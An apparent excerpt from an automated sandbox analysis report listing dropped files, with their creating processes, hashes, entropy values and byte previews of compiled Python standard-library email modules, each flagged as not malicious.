                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s....d.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.e.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d ..d e...Z.G.d!d"..d"e...Z.G.d#d$..d$e...Z.G.d%d&..d&e...Z.G.d'd(..d(e...Z.G.d)d*..d*e...Z.G.d+d,..d,e...Z.G.d-d...d.e...Z.G.d/d0..d0e...Z.G.d1d2..d2e...Z.G.d3d4..d4e...Z.d5S.)6z email package exception classes.c....................@........e.Z.d.Z.d.Z.d.S.)...MessageErrorz+Base class for errors in the email package.N....__name__..__module__..__qualname__..__doc__..r....r.....;C:\Users\user\AppData\Local\xFSOj9El1Q\lib\email\errors.pyr.................r....c....................@...r....)...MessageParseErrorz&Base class for message parsing errors.Nr....r....r....r....r....r........r....r....c....................@...r....)...HeaderParseErrorz.Error while parsing headers.Nr....r....r....r....
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10628
                                                                                                                                                                                                            Entropy (8bit):5.451985537803729
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:WQt3lEmNY0KY3Rmc2eERd6WfbbaKTbefqM0y3E2hjD8g0XuoXs:htVEQY0KYx2ewXbbaSbei0E29D8F1Xs
                                                                                                                                                                                                            MD5:FAB692DA2CF64754C5D81B91C3D90F4C
                                                                                                                                                                                                            SHA1:81E5D03AF5AA0E77F02255A3B33E2423A1ED229E
                                                                                                                                                                                                            SHA-256:616B61B0456DB0FA04ED341435C90FF9933B255D4B43B1FCC91E02C8714E67FB
                                                                                                                                                                                                            SHA-512:30D50E09974AA57E413B92E3AC726F67CD23EE110DBA06F54CFAE5124AF905A146B5AD7BF7105C188BAA417EDF638B1302DF4233EA23220505F4A0C46EF2A0B5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o........b,d.[.......................@...s....d.Z.d.d.g.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e...d...Z.e...d...Z.e...d...Z.e...d...Z.e...d...Z.d.Z.d.Z.e...Z.G.d.d...d.e...Z.G.d.d...d...Z.G.d.d...d.e...Z.d.S.).a....FeedParser - An email feed parser...The feed parser implements an interface for incrementally parsing an email.message, line by line. This has advantages for certain applications, such as.those reading email messages off a socket...FeedParser.feed() is the primary interface for pushing new data into the.parser. It returns when there's nothing more it can do with the available.data. When you have no more data to push into the parser, call .close()..This completes the parsing and returns the root message object...The other advantage of this parser is that it will never raise a parsing.exception. Instead, when it finds something unexpected, it adds a 'defect' to.the current message. Defects are just instances that live on the message.object's .defects a
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10602
                                                                                                                                                                                                            Entropy (8bit):5.449969430415304
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:zQt3lEmz0KYgjRm95weZd6S3DFKTbefqi0G332hjD8gK1W:MtVEC0KYr5weZJ3DFSbeiu329D8j1W
                                                                                                                                                                                                            MD5:8FB5FAFB327FE3A9C2FA79E0FD01ED68
                                                                                                                                                                                                            SHA1:CAE260438432320680DFBF5DC9B0EE56630778E4
                                                                                                                                                                                                            SHA-256:353A83D360BD6ACB4ACC7F067D7EAE369B0FA5D8893CEACA61C3BD92FC607B30
                                                                                                                                                                                                            SHA-512:95528F84F8A23D531680E34FDE6EC93ADC4CBB6702175D4DADBED2EB56D5535D09B84A8F288938CDB6FBAFB7EFDFAB2A89193CC44725D8DD7F9ABACAAF32FBB2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.[.......................@...s....d.Z.d.d.g.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e...d...Z.e...d...Z.e...d...Z.e...d...Z.e...d...Z.d.Z.d.Z.e...Z.G.d.d...d.e...Z.G.d.d...d...Z.G.d.d...d.e...Z.d.S.).a....FeedParser - An email feed parser...The feed parser implements an interface for incrementally parsing an email.message, line by line. This has advantages for certain applications, such as.those reading email messages off a socket...FeedParser.feed() is the primary interface for pushing new data into the.parser. It returns when there's nothing more it can do with the available.data. When you have no more data to push into the parser, call .close()..This completes the parsing and returns the root message object...The other advantage of this parser is that it will never raise a parsing.exception. Instead, when it finds something unexpected, it adds a 'defect' to.the current message. Defects are just instances that live on the message.object's .defects a
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):16512
                                                                                                                                                                                                            Entropy (8bit):5.359012893627204
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:bEojVdZyA82fSNCT4HPb/bl36D27KCjOdXGg8C3PjBQ+CRQKSDh:bE2/8SScT4vb16g31SDh
                                                                                                                                                                                                            MD5:1F8E0CF353976C4A0B12426D33976B1C
                                                                                                                                                                                                            SHA1:111D20B0B88F0F06F2CEC2024C1D344BFE330692
                                                                                                                                                                                                            SHA-256:E1034D72AA8E1F6F03F553F1B3B3781E32BD8A0837EC3905C8DFA01FFD804930
                                                                                                                                                                                                            SHA-512:58DF7A035D4BDAF85DBF02F979788E6BF0745A06ABAC3617BC194E933403C3D4C5427CA335253861F8BEDC0D7E54F614E5372F773B05D6EAB2E11BD703207813
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o........b,dh`.......................@...s....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...e.j.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.d...Z.e.d...Z.e...d.e.j.e.j.B...Z.e...d...Z.e...d...Z.e.j.j.Z.d.d...Z.....d.d.d...Z.G.d.d...d...Z.G.d.d...d...Z G.d.d...d.e!..Z"d.S.).z+Header encoding and decoding functionality.)...Header..decode_header..make_header.....N)...HeaderParseError)...charset..... ..... z. ...N...z. ...us-asciiz.utf-8ai.... =\? # literal =?. (?P<charset>[^?]*?) # non-greedy up to the next ? is the charset. \? # literal ?. (?P<encoding>[qQbB]) # either a "q" or a "b", case insensitive. \? # literal ?. (?P<encoded>.*?) # non-greedy up to the next ?= is the encoded string. \?= # literal ?=. z.[\041-\176]+:$z.\n[^ \t]+:c....................C...s....t.|.d...r.d.d...|.j.D...S.t...|...s.|.d.f.g.S.g.}.|.....D.]A}.t...|...}.d.}.|.r^|...d...}.|.r5|.....}.d.}.|.r?|...|.d.d.f.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):16486
                                                                                                                                                                                                            Entropy (8bit):5.358464602983951
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:6EojVd0yA82fSNCT4HPb/bl36D/7FCjIMIlaTamNjHMSuXi90MXh:6EL/8SScT4vb168cMXh
                                                                                                                                                                                                            MD5:1A5A0D33AF4AD482DFEF6D8FBCDEA152
                                                                                                                                                                                                            SHA1:58FC29933400EBEC861544C4536D03E95A17F1A8
                                                                                                                                                                                                            SHA-256:5AFA9040E3B2F4C22DA143811729C9D6D790C004FB980E1D5D69C4B3B07E23F6
                                                                                                                                                                                                            SHA-512:768B8A08E848109AE37F4714543EEB519E030FEA1243A4662FA0153C29B032CB22D1BFD19102CF50D4D4E64C3EC278A611665C68853DB884BB1FC064E8D744A9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,dh`.......................@...s....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...e.j.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.d...Z.e.d...Z.e...d.e.j.e.j.B...Z.e...d...Z.e...d...Z.e.j.j.Z.d.d...Z.....d.d.d...Z.G.d.d...d...Z.G.d.d...d...Z G.d.d...d.e!..Z"d.S.).z+Header encoding and decoding functionality.)...Header..decode_header..make_header.....N)...HeaderParseError)...charset..... ..... z. ...N...z. ...us-asciiz.utf-8ai.... =\? # literal =?. (?P<charset>[^?]*?) # non-greedy up to the next ? is the charset. \? # literal ?. (?P<encoding>[qQbB]) # either a "q" or a "b", case insensitive. \? # literal ?. (?P<encoded>.*?) # non-greedy up to the next ?= is the encoded string. \?= # literal ?=. z.[\041-\176]+:$z.\n[^ \t]+:c....................C...s....t.|.d...r.d.d...|.j.D...S.t...|...s.|.d.f.g.S.g.}.|.....D.]A}.t...|...}.d.}.|.r^|...d...}.|.r5|.....}.d.}.|.r?|...|.d.d.f.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2018
                                                                                                                                                                                                            Entropy (8bit):5.356125462509024
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:zUhA49ILWjxx2LOzvfOoUFQLfMbhoJ9t1eYG1lGLG+hEl9:zUrIWdT5UFsMbhOQGTEl9
                                                                                                                                                                                                            MD5:3BFD28FFBB8C428178998D5C7213CA92
                                                                                                                                                                                                            SHA1:48EBCADD478CE1E6F010CF77E8CDD99F0A30F340
                                                                                                                                                                                                            SHA-256:DF232C6AEF9422F6B3045CE705685DB555150C41AECE371F862CB2B4AC1328E9
                                                                                                                                                                                                            SHA-512:97444EA51A187F557976AA1D5C4794BE2127E2CEB218A32C6E017A9A87A847649287E2C4A7ECC1DF614FA2D0DA00844A25C802CB8461C3D2777F6E7733954E18
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o........b,d.........................@...sJ...d.Z.g.d...Z.d.d.l.Z.d.d.l.m.Z...d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.S.).z1Various types of useful iterators and generators.)...body_line_iterator..typed_subpart_iterator..walk.....N)...StringIOc....................c...s4.....|.V...|.....r.|.....D.].}.|.....E.d.H...q.d.S.d.S.).z.Walk over the message tree, yielding each subpart... The walk is performed in depth-first order. This method is a. generator.. N)...is_multipart..get_payloadr....)...self..subpart..r.....XC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\lib\email\iterators.pyr........s..................r....Fc....................c...s8.....|.....D.].}.|.j.|.d...}.t.|.t...r.t.|...E.d.H...q.d.S.).z.Iterate over the parts, returning string payloads line-by-line... Optional decode (default False) is passed through to .get_payload().. )...decodeN).r....r......isinstance..strr....)...msgr....r......payloadr....r....r....r...."...s..................r....
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1992
                                                                                                                                                                                                            Entropy (8bit):5.346255600125508
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:l4UhA49ILWjxgYOzvfOoUFQLfMbhoJ9t1eYG1lGLG+hEl9:CUrIWd+5UFsMbhOQGTEl9
                                                                                                                                                                                                            MD5:BE90DF111912225FD87CC6E355CC6BE6
                                                                                                                                                                                                            SHA1:E0C3E63267F9E1247192F4173FEEF6183E04A2CD
                                                                                                                                                                                                            SHA-256:29145CB574160BBFC1DF0F55CD0F06938AD2A40FEB9A0C22D31AD879463883AC
                                                                                                                                                                                                            SHA-512:BA2A1C61278AA9721DEC763893C541F354BE86ABFC367C48782ACA1963C2E898CD5295C64E9E5ADB1DD3AD2937756DD973D2609A5E627ED989774D97574244EB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...sJ...d.Z.g.d...Z.d.d.l.Z.d.d.l.m.Z...d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.S.).z1Various types of useful iterators and generators.)...body_line_iterator..typed_subpart_iterator..walk.....N)...StringIOc....................c...s4.....|.V...|.....r.|.....D.].}.|.....E.d.H...q.d.S.d.S.).z.Walk over the message tree, yielding each subpart... The walk is performed in depth-first order. This method is a. generator.. N)...is_multipart..get_payloadr....)...self..subpart..r.....>C:\Users\user\AppData\Local\xFSOj9El1Q\lib\email\iterators.pyr........s..................r....Fc....................c...s8.....|.....D.].}.|.j.|.d...}.t.|.t...r.t.|...E.d.H...q.d.S.).z.Iterate over the parts, returning string payloads line-by-line... Optional decode (default False) is passed through to .get_payload().. )...decodeN).r....r......isinstance..strr....)...msgr....r......payloadr....r....r....r...."...s..................r......textc...................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):37854
                                                                                                                                                                                                            Entropy (8bit):5.298374674649825
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:b3vKre029TBAXUyICMCeqkYrscT9iHqwhKeZ4rBbajk:7vN029TSUrCJeZqrT9LqKWk
                                                                                                                                                                                                            MD5:006F5B0853A3964F1B78415A068E2256
                                                                                                                                                                                                            SHA1:828501D6724829DA103819DD71F469F70BA7EFAE
                                                                                                                                                                                                            SHA-256:A566EF8EA50A39056F9275288BA81C0957972269DE4838EE065C74DFBAD54B81
                                                                                                                                                                                                            SHA-512:9E27E825530B88C5DE3CE39E445470FF3F162F38410F4A1CF859E79A3DC5BE0371A913663F89D5C7ED5CA734EC40218E5D3334B67056F85C839A67DC1AD68CDD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o........b,di........................@...s....d.Z.d.d.g.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j.Z.d.Z.e...d...Z.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.).z8Basic message object for the email package object model...Message..EmailMessage.....N)...BytesIO..StringIO)...utils)...errors)...Policy..compat32....charset)...decode_bz.; z.[ \(\)<>@,;:\\"/\[\]\?=]c....................C...s4...t.|.....d...\.}.}.}.|.s.|.....d.f.S.|.....|.....f.S.).N..;)...str..partition..strip)...param..a..sep..b..r.....VC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\lib\email\message.py.._splitparam....s............r....Tc....................C...s....|.d.u.r^t.|...d.k.r^t.|.t...r&|.d.7.}.t...|.d...|.d...|.d.....}.d.|.|.f...S.z.|...d.....W.n...t.yG......|.d.7.}.t...|.d.d...}.d.|.|.f.....Y.S.w.|.sOt...|...rXd.|.t...|...f...S.d.|.|.f...S.|.S.).a~...Convenience function to format and retu
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):37828
                                                                                                                                                                                                            Entropy (8bit):5.2968435479055715
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:x3vKre029TBAXUyI2U7AqvYEO9cI9oyCoie5hoDEL:VvN029TSUr2cAqJOyI9o7oiYL
                                                                                                                                                                                                            MD5:E77144FD0ED4E95ECE31384A8383CDB1
                                                                                                                                                                                                            SHA1:95D3363D66AEC8682054DF3ED8FD56B705899979
                                                                                                                                                                                                            SHA-256:538298E12D71365CC9831F03506A7867F0C7CFF8F5A11716523C66742E0CB133
                                                                                                                                                                                                            SHA-512:8B1F0550D99CF62021B77B06EAA4A7DB438EA249BCF25B2713F39A760E6F649133CDE295C84BB8E96B461E3D6DEFAB8D0FC78C849394040DB3CF4B9671B90E4C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,di........................@...s....d.Z.d.d.g.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j.Z.d.Z.e...d...Z.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.).z8Basic message object for the email package object model...Message..EmailMessage.....N)...BytesIO..StringIO)...utils)...errors)...Policy..compat32....charset)...decode_bz.; z.[ \(\)<>@,;:\\"/\[\]\?=]c....................C...s4...t.|.....d...\.}.}.}.|.s.|.....d.f.S.|.....|.....f.S.).N..;)...str..partition..strip)...param..a..sep..b..r.....<C:\Users\user\AppData\Local\xFSOj9El1Q\lib\email\message.py.._splitparam....s............r....Tc....................C...s....|.d.u.r^t.|...d.k.r^t.|.t...r&|.d.7.}.t...|.d...|.d...|.d.....}.d.|.|.f...S.z.|...d.....W.n...t.yG......|.d.7.}.t...|.d.d...}.d.|.|.f.....Y.S.w.|.sOt...|...rXd.|.t...|...f...S.d.|.|.f...S.|.S.).a~...Convenience function to format and return a key=value pair...
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5723
                                                                                                                                                                                                            Entropy (8bit):4.929346899426717
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:r/3XAt857ue6RPlVEnTSi7sebc9++etT2FZXUVt3NzMb:jgtq7+RPETSi7sebc9M2LXUVt3NzMb
                                                                                                                                                                                                            MD5:709B9B77433CE6C30CE29343AD330153
                                                                                                                                                                                                            SHA1:52F3C0EE559BC69F293CE71AB224B2E409968ABC
                                                                                                                                                                                                            SHA-256:06D100DDB00D7D6D446562CBEAC8F1DD737C03EBA1BD29D2FC0B72E60F52E257
                                                                                                                                                                                                            SHA-512:D2EE8B0382A2766A674AA2AB910C67B2820B7E0684BE717C6B874E70D36ECFA92A9AD81C99D480BF1AF31127C92F9C722CDDB56BFF452833024B912000E6805D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o........b,d4........................@...sx...d.Z.g.d...Z.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d...Z.G.d.d...d.e...Z.d.S.).z-A parser of RFC 2822 and MIME email messages.)...Parser..HeaderParser..BytesParser..BytesHeaderParser..FeedParser..BytesFeedParser.....)...StringIO..TextIOWrapper).r....r....)...compat32c....................@...s0...e.Z.d.Z.d.e.d...d.d...Z.d.d.d...Z.d.d.d...Z.d.S.).r....N....policyc....................C...s....|.|._.|.|._.d.S.).a....Parser of RFC 2822 and MIME email messages... Creates an in-memory object tree representing the email message, which. can then be manipulated and turned over to a Generator to return the. textual representation of the message... The string must be formatted as a block of RFC 2822 headers and header. continuation lines, optionally preceded by a `Unix-from' header. The. header block is terminated either by the end of the string or by a. blank
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5697
                                                                                                                                                                                                            Entropy (8bit):4.927415797276728
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:Y/3XAtP7ue6RPlVEnTSi7sebc9++etT2FZXUVt3NzMb:kgtP7+RPETSi7sebc9M2LXUVt3NzMb
                                                                                                                                                                                                            MD5:57E3B28374B37314F7E8171A86FA3B63
                                                                                                                                                                                                            SHA1:37586B081902BBBE35B28A4F35762431C66461DA
                                                                                                                                                                                                            SHA-256:158369B12BFF03D087A4EF35C06B3D53E9755B93E380AC83752B9639F5B5B39C
                                                                                                                                                                                                            SHA-512:1B7CDEBB66D0232BE03ED286246030D8065568FA330FF68E2A38D3ACB0E9AC970545D7FB398DD6A90A51D33120FC8991578A697960585B190D2763436C7BAAE2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d4........................@...sx...d.Z.g.d...Z.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d...Z.G.d.d...d.e...Z.d.S.).z-A parser of RFC 2822 and MIME email messages.)...Parser..HeaderParser..BytesParser..BytesHeaderParser..FeedParser..BytesFeedParser.....)...StringIO..TextIOWrapper).r....r....)...compat32c....................@...s0...e.Z.d.Z.d.e.d...d.d...Z.d.d.d...Z.d.d.d...Z.d.S.).r....N....policyc....................C...s....|.|._.|.|._.d.S.).a....Parser of RFC 2822 and MIME email messages... Creates an in-memory object tree representing the email message, which. can then be manipulated and turned over to a Generator to return the. textual representation of the message... The string must be formatted as a block of RFC 2822 headers and header. continuation lines, optionally preceded by a `Unix-from' header. The. header block is terminated either by the end of the string or by a. blank
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7673
                                                                                                                                                                                                            Entropy (8bit):5.5082969747672665
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:0LJLyjCY2rlgeRk/SE3A4iIf3HOxK4RVZtpes7tOcQekFUyq2n1/ugYu9eYSAd7h:AJYUGQ2SE3h27RlpsyyFhugYQeYSkJcs
                                                                                                                                                                                                            MD5:824DCCE6FD2DCA89DF36359694B8AE9D
                                                                                                                                                                                                            SHA1:ACCCEE2131E20BD7CB2262A08416FD7AE91C8B01
                                                                                                                                                                                                            SHA-256:1858A4ABA907F9F2F58C7AC2BC40A2B15F52C1D9848F774D23285ADFFB4C236A
                                                                                                                                                                                                            SHA-512:A8EBD98FF2C6AF066C95D97C12F773E00A53761E9154D15277F192DFD39BFA51EEBA5A58B7ABA651B9334564A1128770E4279CE6E2A0C6A71602FA459F0D5A5A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o........b,d.'.......................@...sF...d.Z.g.d...Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.Z.d.Z.d.Z.d.d...e.d...D...Z.e.d.d.....Z.e.d.d.....Z.d.e...d.....e...d.....D.].Z.e.e...e.e.<.q;d.e.e.d...<.d.D.].Z.e.e...e.e.<.qLd.d...Z.d.d...Z.d.d...Z.d.d...Z.d+d.d...Z.d.d...Z.d.d...Z.d,d.d ..Z.e.d.d.....Z.d!D.].Z.e.e...e.e.<.q.d"e.f.d#d$..Z.e.f.d%d&..Z.e.Z.e.Z.d'd(..Z.d)d*..Z d.S.)-aF...Quoted-printable content transfer encoding per RFCs 2045-2047...This module handles the content transfer encoding method defined in RFC 2045.to encode US ASCII-like 8-bit data called `quoted-printable'. It is used to.safely encode text that is in a character set similar to the 7-bit US ASCII.character set, but that includes some 8-bit characters that are normally not.allowed in email bodies or headers...Quoted-printable is very space-inefficient for encoding binary files; use the.email.base64mime module for that instead...This module provides an interface to encode and decode both headers and bodies.with quoted-p
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7647
                                                                                                                                                                                                            Entropy (8bit):5.507720722688495
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:jLJLyjCY2rlgeRk/SEp4iIf3HOxK4RVZtp9s7tOcQekFUyq2n1/nGYu9ewBAd7zD:/JYUGQ2SE+27RlpXyyFhnGYQewBk8j4B
                                                                                                                                                                                                            MD5:0F4BD7EEE4546B4A15B5FEE37459029B
                                                                                                                                                                                                            SHA1:BACEE2DEDDA66F49ED2B8FB8F562702669C913A2
                                                                                                                                                                                                            SHA-256:BD4FDC33DD8EF60637FF5CD4B5D1F23A96FD09F2F30112C3A273F18A9A667AFA
                                                                                                                                                                                                            SHA-512:FB67FEDB2F830DD9868C22942592884B363392DF075BADFD318F82333C6DE2FE41C6DAC29EBC1A9D53E5F113A365F3BB293973A915109CFD079EF1C7F7880979
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.'.......................@...sF...d.Z.g.d...Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.Z.d.Z.d.Z.d.d...e.d...D...Z.e.d.d.....Z.e.d.d.....Z.d.e...d.....e...d.....D.].Z.e.e...e.e.<.q;d.e.e.d...<.d.D.].Z.e.e...e.e.<.qLd.d...Z.d.d...Z.d.d...Z.d.d...Z.d+d.d...Z.d.d...Z.d.d...Z.d,d.d ..Z.e.d.d.....Z.d!D.].Z.e.e...e.e.<.q.d"e.f.d#d$..Z.e.f.d%d&..Z.e.Z.e.Z.d'd(..Z.d)d*..Z d.S.)-aF...Quoted-printable content transfer encoding per RFCs 2045-2047...This module handles the content transfer encoding method defined in RFC 2045.to encode US ASCII-like 8-bit data called `quoted-printable'. It is used to.safely encode text that is in a character set similar to the 7-bit US ASCII.character set, but that includes some 8-bit characters that are normally not.allowed in email bodies or headers...Quoted-printable is very space-inefficient for encoding binary files; use the.email.base64mime module for that instead...This module provides an interface to encode and decode both headers and bodies.with quoted-p
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9736
                                                                                                                                                                                                            Entropy (8bit):5.529351651195896
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:0bd47opYU1b0vS56c8PNMw1TBjUExUmXDa4ED9SncLmECSStw3TG/3yjO/9:apyvPFSwNBjUwRXDa4W9/m6GyGb/9
                                                                                                                                                                                                            MD5:2D5D5DDFFFC16CD9C87D71222D02EE9E
                                                                                                                                                                                                            SHA1:DBBEC4EBB1147174B8A56A6C474EFCACF33A18A8
                                                                                                                                                                                                            SHA-256:38668254F49FCE0E566542182EC7711397FBE646A766E02337B10FC209794584
                                                                                                                                                                                                            SHA-512:CAFA0134EC456D3EB40B68C6CCF759172840ED910427C37206CD07D057DC04131D8E0B021C98F0E3D2DB588269B8DC8C8F69D78B72596BEDC15D966C34393E5C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o........b,d.5.......................@...sT...d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.Z.d.Z.d.Z.d.Z.d.Z.e...d...Z.e...d...Z.d.d...Z.d.d...Z.d5d.d...Z.d.d...Z.d.d...Z d6d.d...Z!d7d.d...Z"d8d.d ..Z#d!d"..Z$d#d$..Z%d%d&..Z&d'd(..Z'd8d)d*..Z(e...d+e.j)..Z*d,d-..Z+.../d9d0d1..Z,d:d3d4..Z-d.S.);z.Miscellaneous utilities.)...collapse_rfc2231_value..decode_params..decode_rfc2231..encode_rfc2231..formataddr..formatdate..format_datetime..getaddresses..make_msgid..mktime_tz..parseaddr..parsedate..parsedate_tz..parsedate_to_datetime..unquote.....N)...quote)...AddressList).r....).r....r......_parsedate_tz)...Charsetz., ..z.....'z.[][\\()<>@,:;".]z.[\\"]c....................C...s$...z.|.......W.d.S...t.y.......Y.d.S.w.).z8Return True if s contains surrogate-escaped binary data.FT)...encode..UnicodeEncodeError)...s..r.....TC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\lib\email\utils.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9710
                                                                                                                                                                                                            Entropy (8bit):5.5284961343995045
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:dbd4iopYU1b0vS5Tc8PNMw1TBrUEPUcXDu4cleZkcLPcCSStw3TG/3Wib/9:4pyv+FSwNBrUmbXDu4zRPiGyGF/9
                                                                                                                                                                                                            MD5:108A4A587489E95D5A1214CBBAC6F3C8
